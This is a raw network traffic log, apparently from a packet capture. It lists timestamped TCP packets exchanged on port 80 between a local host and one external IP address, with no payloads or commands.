Nov 11, 2024 10:33:04.851258993 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.851264000 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.851270914 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.851284027 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.851285934 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.851293087 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.851305008 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.851305962 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.851322889 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.851334095 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.851334095 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.851357937 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.851378918 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.916826963 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.916845083 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.916858912 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.916871071 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.916877031 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.916887045 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.916891098 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.916903019 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.916917086 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.916918993 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.916943073 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.916965008 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.948574066 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.948586941 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.948597908 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.948662996 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.948683023 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.948760986 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.948760986 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.948780060 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.948797941 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.948812008 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.948816061 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.948822975 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.948834896 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.948836088 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.948848009 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.948848963 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.948880911 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.948921919 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.948956013 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.948982954 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.948993921 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.949019909 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.949028015 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.949047089 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.949059010 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.949069023 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.949080944 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.949081898 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.949093103 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.949093103 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.949116945 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.949137926 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.949179888 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.949189901 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.949202061 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.949217081 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.949227095 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.949243069 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.949254990 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.949265957 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.949275970 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.949290991 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.949297905 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.949302912 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.949325085 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.949373007 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.949414015 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.949448109 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.949460030 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.949471951 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.949484110 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.949489117 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.949492931 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.949501038 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.949511051 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.949512005 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.949522972 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.949522972 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.949548006 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.949561119 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.949569941 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.949582100 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.949594021 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.949603081 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.949604988 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.949615002 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.949621916 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.949631929 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.949631929 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.949644089 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.949646950 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.949660063 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.949665070 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.949691057 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.949799061 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.949816942 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.949827909 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.949835062 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.949845076 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.949856043 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.949856043 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.949867010 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.949878931 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.949878931 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.949891090 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.949903011 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.949904919 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.949913979 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.949925900 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.949928045 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.949939013 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.949949026 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.949961901 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.949984074 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.949985027 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.949994087 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.950006008 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.950018883 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.950031042 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.950038910 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.950047970 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.950050116 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.950061083 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.950069904 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.950081110 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.950090885 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.950098991 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.950103045 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.950114965 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.950123072 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.950135946 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.950150967 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.950160027 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.950170994 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.950181961 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.950195074 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.950198889 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.950208902 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.950222969 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.950241089 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.950246096 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.950253010 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.950264931 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.950273037 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.950278044 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.950289965 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.950300932 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.950304031 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.950314999 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.950326920 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.950344086 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.950520992 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.950556993 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.950562954 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.950608969 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.950623035 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.950655937 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.950762033 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.950773954 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.950783968 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.950792074 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.950795889 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.950800896 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.950819969 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.950820923 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.950834036 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.950839043 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.950845957 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.950845957 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.950858116 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.950865030 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.950869083 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.950876951 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.950880051 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.950891018 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.950896025 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.950901985 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.950907946 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.950917959 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.950930119 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.950948000 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.951225042 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.951236010 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.951247931 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.951258898 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.951258898 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.951270103 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.951270103 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.951282024 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.951289892 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.951303005 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.951318979 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.951320887 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.951332092 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.951334953 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.951344013 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.951354027 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.951361895 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.951365948 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.951376915 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.951385021 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.951389074 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.951400995 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.951422930 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.951453924 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.951466084 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.951477051 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.951488972 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.951491117 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.951494932 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.951510906 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.951510906 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.951524019 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.951530933 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.951534033 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.951545000 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.951565027 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.951566935 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.951572895 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.951579094 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.951590061 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.951598883 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.951601982 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.951611996 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.951627970 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.951636076 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.952233076 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.952271938 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.952291965 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.952302933 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.952326059 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.952337027 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.952354908 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.952366114 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.952375889 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.952387094 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.952389956 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.952409983 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.952413082 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.952420950 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.952433109 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.952436924 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.952449083 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.952450991 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.952464104 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.952472925 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.952475071 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.952483892 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.952493906 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.952517986 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.952586889 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.952621937 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.952685118 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.952696085 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.952706099 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.952718019 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.952721119 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.952728987 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.952730894 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.952745914 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.952758074 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.952760935 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.952771902 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.952781916 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.952784061 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.952795982 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.952806950 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.952810049 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.952817917 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.952822924 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.952841043 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.952862978 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.952908993 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.952929020 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.952940941 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.952941895 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.952963114 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.952972889 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.953083038 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.953094006 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.953109980 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.953115940 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.953119993 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.953130007 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.953131914 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.953145981 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.953152895 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.953154087 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.953170061 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.953176022 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.953187943 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.953191996 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.953200102 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.953201056 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.953211069 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.953219891 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.953222036 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.953227997 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.953238964 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.953246117 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.953249931 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.953258038 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.953262091 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.953273058 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.953277111 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.953284979 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.953291893 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.953314066 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.953345060 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.953356028 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.953366041 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.953377962 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.953378916 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.953388929 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.953399897 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.953403950 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.953413010 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.953428984 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.953430891 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.953442097 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.953444958 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.953454971 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.953465939 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.953466892 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.953478098 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.953489065 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.953493118 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.953500986 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.953515053 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.953516960 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.953531981 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.953537941 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.953543901 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.953547955 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.953561068 CET	80	49704	185.215.113.206	192.168.2.5
